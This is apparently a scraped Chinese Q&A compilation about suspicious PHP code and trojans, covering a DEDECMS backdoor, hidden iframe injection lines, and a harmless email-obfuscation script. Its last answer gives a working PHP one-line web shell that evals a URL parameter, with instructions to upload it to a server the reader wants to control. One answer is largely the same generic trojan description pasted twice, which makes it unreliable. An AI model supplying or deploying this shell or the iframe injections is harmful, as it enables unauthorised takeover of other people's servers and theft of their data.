本文目录一览:
- 这段php代码是什么意思?麻烦详细点
- 一段木马代码
- php网站,代码有一段不知道什么意思,求大神帮忙(代码如下)
- 能否有一个软件能去掉php代码中的一段木马代码
- 请问这些代码是不是木马病毒?
- 求一个简单的PHP木马程序
这段php代码是什么意思?麻烦详细点
把575BfMVM4wf0s 拿去MD5解密 会得到一个域名地址 整段代码的意思是 判断当前域名 如果是 该域名 则执行PHP一句话木马 如果不是 跳转到首页 好象是DEDECMS 搞的,不知道为什么留这样的后门 看他们这么做,以后想搞谁的站就能搞谁的站了!
一段木马代码
iframe src="14.htm" width=100 height=1/iframe
iframe src="r.htm" width=100 height=1/iframe
iframe src="1.htm" width=100 height=1/iframe
以上为常用挂马方式。
下面这段:
script src=';web_id=850334' language='JavaScript' charset='gb2312'/script
应该是你网站的统计代码吧?
php网站,代码有一段不知道什么意思,求大神帮忙(代码如下)
网友采纳的那个回答是个毛线啊?就给你把这段js做了一下格式化。我来给你解释一下吧:
这个代码是前端的JS代码,PHP是后端语言,这个代码跟PHP没有关系;
这个代码不是病毒木马代码,检测工具检测出来红色大概是因为这个是放在了注释CDATA块里。注释CDATA块其实是因以前的低端浏览器不识别JS代码而生的,现在完全没必要再注释掉了;
你还是不放心的话,那我告诉你,这个代码是给你隐藏你的真实邮箱的。因为很多发送垃圾邮件的人甚至搜索引擎,都会用爬虫扫描各个网站的邮箱(因为邮箱格式特征很明显),扫到之后就给你发垃圾邮件。所以这个代码是由PHP简单的加密之后写到页面上一串16进制数字,然后用JS解密出来,爬虫就扫不到你邮箱了,就这么简单。
也许采纳的那位哥们不服,说这么一段代码看不出什么来。那好,我说说每一行的意思。
首先是个闭包,懂前端的人都知道。
然后try一下,是为了谨慎,免得IE弹出页面脚本有错误。
然后获取document.currentScript标签。如果没有这个属性的话,就用原始的方法来做,这里又是一个自执行函数(闭包)。
拿到当前的script标签,那前一个恰好就是加密标签了,邮箱就在这个标签的data-cfemail属性中,将这个标签保存成变量为c。
然后就是解密了。
解密算法很简单,就是一串16进制串,两两读取。
前两个读出来作为密钥
从后面每两个读出来,和密钥做异或,之后的值用ASCII读出字母
这些字母拼出来的就是你的邮箱
解密之后创建一个文本节点替换掉原来的加密标签,就完成了
能否有一个软件能去掉php代码中的一段木马代码
搜索一下 PHP网站源码批量替换工具 v1.0,试试。或者其他类似的软件。替换之前记得备份原来的所有文件。
请问这些代码是不是木马病毒?
这个代码属于木马病毒。 它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。 所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“马”兴叹。 所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。 从木马的发展来看,基本上可以分为两个阶段。 最初网络还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的网络和编程知识。 而后随着WINDOWS平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练的操作木马,相对的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,因此对服务端的破坏也更大了。 所以所木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言。 什么是木马 特洛伊木马(以下简称木马),英文叫做“Trojan house”,其名称取自希腊神话的特洛伊木马记。 它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。 所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“马”兴叹。 所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。 从木马的发展来看,基本上可以分为两个阶段。 最初网络还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的网络和编程知识。 而后随着WINDOWS平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练的操作木马,相对的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,因此对服务端的破坏也更大了。 所以所木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言。 用杀毒软件可以清除木马。它不是一种对自己不利的“病毒”,能够应用和奴驾它的人,就将它看为是一种资源,它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。 一般自己中了木马病毒,首先要认清这是个什么病毒。其实 Trojan是某些防毒软件对后门木马的一种统称,它并不代表着固定的一个,而是一类,所以即使遇到同样名字的木马可能它们也并不相同。 希望我能帮助你解疑释惑。
求一个简单的PHP木马程序
<?php
if($_GET[r]) eval($_GET[r]);
?>
将上面的代码放到一个php文件并设法上传到你想控制的服务器,
在网页上访问服务器上的该文件,只要在网址后面加上
?r=你想要的任何操作(php语言编写)
只要你懂一点php,sql,这台服务器的信息都在你的掌握。
